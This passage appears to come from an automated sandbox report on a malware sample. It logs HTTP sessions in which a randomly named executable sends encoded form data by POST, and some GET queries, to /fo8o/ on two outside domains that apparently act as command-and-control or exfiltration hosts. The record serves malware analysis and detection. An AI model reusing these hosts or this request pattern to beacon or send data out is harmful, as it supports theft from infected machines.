                                                                                  Data Ascii: 7BpTBrLp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
                                                                                  Nov 25, 2024 18:14:38.425026894 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:38 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.450021195.110.124.133805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:39.727935076 CET10902OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 50 6f 6d 4c 43 66 2f 74 36 30 52 55 6f 71 73 39 59 75 51 4b 61 34 6f 35 70 72 44 76 4d 48 39 53 62 53 68 6a 65 48 2b 32 33 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 47 4c 61 4b 4e 65 70 57 45 41 32 2b 42 2b 44 43 52 31 73 43 35 72 75 62 64 54 48 39 48 45 6d 53 68 4b 67 37 75 52 70 75 59 43 72 6e 69 79 5a 4f 78 78 2b 66 77 38 68 64 6d 30 68 56 58 6f 4e 6d 78 71 49 59 47 2f 69 31 5a 34 2b 48 2f 6a [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUeLXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJM [TRUNCATED]
                                                                                  Nov 25, 2024 18:14:41.151376963 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:40 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.450022195.110.124.133805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:14:42.396215916 CET513OUTGET /fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:14:43.704267979 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:43 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.450023217.196.55.202805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:15:06.287043095 CET788OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 76 4e 72 6a 75 6d 30 30 49 4c 61 47 32 41 39 45 68 75 48 58 68 74 4e 38 33 6a 33 52 2b 57 52 6b 41 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
                                                                                  Nov 25, 2024 18:15:07.583836079 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:07 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.450024217.196.55.202805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:15:08.931967020 CET808OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 2b 68 77 71 44 63 39 72 59 2f 4a 32 6a 6d 44 58 34 6d 45 37 4c 4e 4e 4a 54 4a 57 65 6b 6a 6b 6f 3d
                                                                                  Data Ascii: 7BpTBrLp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
                                                                                  Nov 25, 2024 18:15:10.214279890 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:10 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.450025217.196.55.202805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:15:11.594854116 CET10890OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 78 48 57 62 6e 4e 6e 39 58 44 6b 63 50 7a 63 2f 49 66 5a 6e 42 33 59 7a 51 6e 57 4b 66 49 72 65 6b 75 34 32 30 73 63 6f 4b 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 5a 52 39 30 30 4c 6f 68 32 6c 42 77 34 6d 37 61 5a 69 6a 72 67 32 72 76 49 72 5a 7a 56 34 75 5a 39 32 42 53 54 4b 34 66 6a 2f 42 38 4e 6d 64 70 76 4c 64 4f 51 6b 65 66 4c 34 52 42 45 32 54 6a 57 6c 79 4a 38 76 47 6d 71 67 48 44 62 38 [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJxHWbnNn9XDkcPzc/IfZnB3YzQnWKfIreku420scoKATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHZR900Loh2lBw4m7aZijrg2rvIrZzV4uZ92BSTK4fj/B8NmdpvLdOQkefL4RBE2TjWlyJ8vGmqgHDb8FPeVK7i3wjnW4Pkze5PVOi1QX827zWpkmljH0ttuiIp3QemGg1xQL6nC37nf6XPI4KATMgnVAKME42Z8DL8OybVLpktW6GlxYlU5aI0OpSMJSB4iJRacAN12s2+zc2ARHpFe90cC5U7+mKvZl2yMu8smqwJpNXkSTLUB8JW36BpgzKjTATzL/D1RlQZmMo7+IT5MAsmfDWkWGxGnylL78IzMeSiC9hMlVnpVRDCU5SM4jzvqdIO1s1t1askykCWpwY9wYfHRRA9iTk9HKitsqtVy41gY9YkVKq1RwBhDLTNWY/dQ6g5k4ErKWnmMSZOfYNmHe6uYO+jKxiATAaAERvIpDJfEcBj7wUSFIFuZQAfApvKYpYVtd1CAQte3+V12D6numDy1w2VPWnIKF3xJWfie2IqH0c0iusz09pLReNQv4O0ppV+kALBooou/oMbCnF0CR/pNgJuLc7H7RpmmEFD3/buWJ/BosMnnN3kbzP/LY8gGepMRZk8f5aQCTg/NlPQpwRSIrex4Xbe9T720PRkZoHfkkdtqOpqVW73vhJj4v5PcVmldOF6+gluDjnrRriUwvRUVEXfR2b3hUI5RnHvFqyYrbfV2d6LBYOUsw13oMdbhY7gTrPN6ruraLewSydN24N73HoTY6DF9B0vmGZGuVzmxcwh2ZI [TRUNCATED]
                                                                                  Nov 25, 2024 18:15:12.854144096 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:12 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.450026217.196.55.202805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:15:14.328917027 CET509OUTGET /fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd HTTP/1.1
